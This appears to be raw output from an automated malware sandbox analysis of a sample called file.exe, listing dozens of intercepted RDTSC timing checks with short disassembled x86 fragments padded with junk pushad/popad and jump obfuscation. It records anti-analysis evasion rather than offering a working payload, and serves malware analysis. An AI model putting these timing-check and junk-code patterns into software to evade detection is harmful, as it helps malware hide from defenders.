                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A03F5 second address: 53A040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F77984h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0CCD second address: 53B0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 362D9C8Dh 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0CE2 second address: 53B0CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F1F second address: 53B0F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 60CC736Dh 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F4B second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F51 second address: 53B0F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0304 second address: 53E033E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50F77988h 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E033E second address: 53E0342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0342 second address: 53E0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0348 second address: 53E0373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F50CBBC3Ch 0x00000008 pop ecx 0x00000009 mov ecx, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1F50CBBC3Dh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0373 second address: 53E0386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0386 second address: 53E03EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50CBBC3Fh 0x00000009 and ax, E93Eh 0x0000000e jmp 00007F1F50CBBC49h 0x00000013 popfd 0x00000014 jmp 00007F1F50CBBC40h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov eax, 67803A13h 0x00000025 call 00007F1F50CBBC48h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E03EE second address: 53E03F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E03F3 second address: 53E044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC3Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d jmp 00007F1F50CBBC40h 0x00000012 mov eax, dword ptr [76FA65FCh] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F1F50CBBC43h 0x00000022 jmp 00007F1F50CBBC43h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E044A second address: 53E0496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F1F50F7797Eh 0x00000010 je 00007F1FC2ABAE65h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1F50F77987h 0x0000001d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0496 second address: 53E04FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f mov bh, cl 0x00000011 popad 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 pushad 0x00000017 mov bx, D43Eh 0x0000001b popad 0x0000001c and ecx, 1Fh 0x0000001f jmp 00007F1F50CBBC40h 0x00000024 ror eax, cl 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F1F50CBBC3Ch 0x0000002f or cl, 00000038h 0x00000032 jmp 00007F1F50CBBC3Bh 0x00000037 popfd 0x00000038 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E05DD second address: 53E05F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539003B second address: 53900F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov dl, 11h 0x00000007 pushfd 0x00000008 jmp 00007F1F50CBBC46h 0x0000000d sbb ch, FFFFFFC8h 0x00000010 jmp 00007F1F50CBBC3Bh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F1F50CBBC46h 0x0000001f and esp, FFFFFFF8h 0x00000022 pushad 0x00000023 pushad 0x00000024 mov cx, F5C3h 0x00000028 call 00007F1F50CBBC48h 0x0000002d pop esi 0x0000002e popad 0x0000002f pushfd 0x00000030 jmp 00007F1F50CBBC3Bh 0x00000035 sbb ah, 0000001Eh 0x00000038 jmp 00007F1F50CBBC49h 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, ecx 0x00000040 jmp 00007F1F50CBBC3Eh 0x00000045 push eax 0x00000046 pushad 0x00000047 push edx 0x00000048 pop ecx 0x00000049 mov ch, dh 0x0000004b popad 0x0000004c xchg eax, ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 movsx edi, cx 0x00000053 mov dx, si 0x00000056 popad 0x00000057 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53900F0 second address: 539016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F1F50F77986h 0x0000000f push eax 0x00000010 jmp 00007F1F50F7797Bh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F1F50F77986h 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e pushad 0x0000001f mov ecx, 023DA94Dh 0x00000024 mov bl, ch 0x00000026 popad 0x00000027 push ecx 0x00000028 pushad 0x00000029 mov edx, esi 0x0000002b mov cx, 2D03h 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 pushad 0x00000034 mov cx, 397Bh 0x00000038 jmp 00007F1F50F77980h 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539016F second address: 5390176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, dl 0x00000006 popad 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390176 second address: 53901B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1F50F77986h 0x0000000f mov dword ptr [esp], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F1F50F77988h 0x0000001a popad 0x0000001b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901B5 second address: 53901CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901CC second address: 53901D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901D0 second address: 53901D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901D6 second address: 53901DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901DB second address: 5390257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1F50CBBC46h 0x0000000a or ch, 00000048h 0x0000000d jmp 00007F1F50CBBC3Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 je 00007F1FC284A043h 0x0000001c jmp 00007F1F50CBBC46h 0x00000021 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1F50CBBC3Dh 0x00000031 or cx, B816h 0x00000036 jmp 00007F1F50CBBC41h 0x0000003b popfd 0x0000003c movzx eax, di 0x0000003f popad 0x00000040 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390257 second address: 539025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539025D second address: 5390261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390261 second address: 5390290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1FC2B05D38h 0x0000000e pushad 0x0000000f call 00007F1F50F7797Eh 0x00000014 mov esi, 1EB07381h 0x00000019 pop ecx 0x0000001a mov dl, 64h 0x0000001c popad 0x0000001d mov edx, dword ptr [esi+44h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390290 second address: 5390296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390296 second address: 53902B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F77989h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380811 second address: 53808FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 jmp 00007F1F50CBBC3Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F1F50CBBC3Eh 0x00000017 or si, 6578h 0x0000001c jmp 00007F1F50CBBC3Bh 0x00000021 popfd 0x00000022 mov si, F4AFh 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1F50CBBC3Eh 0x00000031 sub si, FFD8h 0x00000036 jmp 00007F1F50CBBC3Bh 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F1F50CBBC48h 0x00000042 adc cl, 00000038h 0x00000045 jmp 00007F1F50CBBC3Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov bx, si 0x0000004f popad 0x00000050 and esp, FFFFFFF8h 0x00000053 pushad 0x00000054 jmp 00007F1F50CBBC40h 0x00000059 mov edi, eax 0x0000005b popad 0x0000005c xchg eax, ebx 0x0000005d jmp 00007F1F50CBBC3Ch 0x00000062 push eax 0x00000063 jmp 00007F1F50CBBC3Bh 0x00000068 xchg eax, ebx 0x00000069 jmp 00007F1F50CBBC46h 0x0000006e xchg eax, esi 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F1F50CBBC47h 0x00000076 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53808FE second address: 5380945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 2Ch 0x00000005 pushfd 0x00000006 jmp 00007F1F50F77980h 0x0000000b jmp 00007F1F50F77985h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1F50F77983h 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380945 second address: 5380962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380962 second address: 53809C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F50F77987h 0x00000008 pop eax 0x00000009 mov edi, 4B9423ECh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 movsx edx, ax 0x00000016 pushfd 0x00000017 jmp 00007F1F50F7797Ah 0x0000001c xor ax, 6208h 0x00000021 jmp 00007F1F50F7797Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b jmp 00007F1F50F77986h 0x00000030 sub ebx, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov bh, 9Ch 0x00000037 popad 0x00000038 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53809C8 second address: 5380A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c call 00007F1F50CBBC44h 0x00000011 mov ah, 96h 0x00000013 pop ebx 0x00000014 pushad 0x00000015 mov edi, esi 0x00000017 push esi 0x00000018 pop edx 0x00000019 popad 0x0000001a popad 0x0000001b je 00007F1FC28515CCh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A03 second address: 5380A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A08 second address: 5380A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F1F50CBBC3Bh 0x00000019 sub esi, 4A74931Eh 0x0000001f jmp 00007F1F50CBBC49h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A53 second address: 5380A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A58 second address: 5380A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC3Ah 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A66 second address: 5380ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b mov al, dl 0x0000000d pushfd 0x0000000e jmp 00007F1F50F77986h 0x00000013 and esi, 77A08B78h 0x00000019 jmp 00007F1F50F7797Bh 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007F1FC2B0D27Ch 0x00000026 jmp 00007F1F50F77986h 0x0000002b test byte ptr [76FA6968h], 00000002h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F1F50F7797Ah 0x0000003b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380ACE second address: 5380AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380AD4 second address: 5380ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380ADA second address: 5380ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380ADE second address: 5380AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380AE2 second address: 5380B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F1FC2851502h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F50CBBC3Eh 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B02 second address: 5380B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B08 second address: 5380B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov cx, 695Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B1D second address: 5380B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B21 second address: 5380B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B27 second address: 5380B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50F77984h 0x00000009 sub esi, 6B4714F8h 0x0000000f jmp 00007F1F50F7797Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F1F50F77988h 0x0000001b adc ch, 00000058h 0x0000001e jmp 00007F1F50F7797Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov bx, AC46h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B86 second address: 5380B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380B8B second address: 5380BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bx, 7964h 0x0000000f mov edx, 3BE2C7D0h 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1F50F77980h 0x0000001f add si, 3418h 0x00000024 jmp 00007F1F50F7797Bh 0x00000029 popfd 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380CC6 second address: 5380CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0694h 0x00000007 push edx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esp, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F50CBBC41h 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380CE9 second address: 5380CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380CEF second address: 5380CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380CF6 second address: 5380D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov al, C2h 0x0000000d mov ax, di 0x00000010 popad 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390C7E second address: 5390C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390C84 second address: 5390CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1F50F77980h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, 1DA5A7D3h 0x00000018 jmp 00007F1F50F77988h 0x0000001d popad 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390CCF second address: 5390D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50CBBC41h 0x00000009 and al, 00000046h 0x0000000c jmp 00007F1F50CBBC41h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dx, cx 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F1F50CBBC48h 0x00000029 pop esi 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A61 second address: 5390A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A65 second address: 5390A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A69 second address: 5390A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A6F second address: 5390A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A75 second address: 5390A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410619 second address: 5410658 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushfd 0x00000008 jmp 00007F1F50CBBC3Bh 0x0000000d and ah, 0000006Eh 0x00000010 jmp 00007F1F50CBBC49h 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1F50CBBC3Ah 0x00000020 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400A84 second address: 5400AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50F7797Fh 0x00000009 jmp 00007F1F50F77983h 0x0000000e popfd 0x0000000f mov esi, 216CF89Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
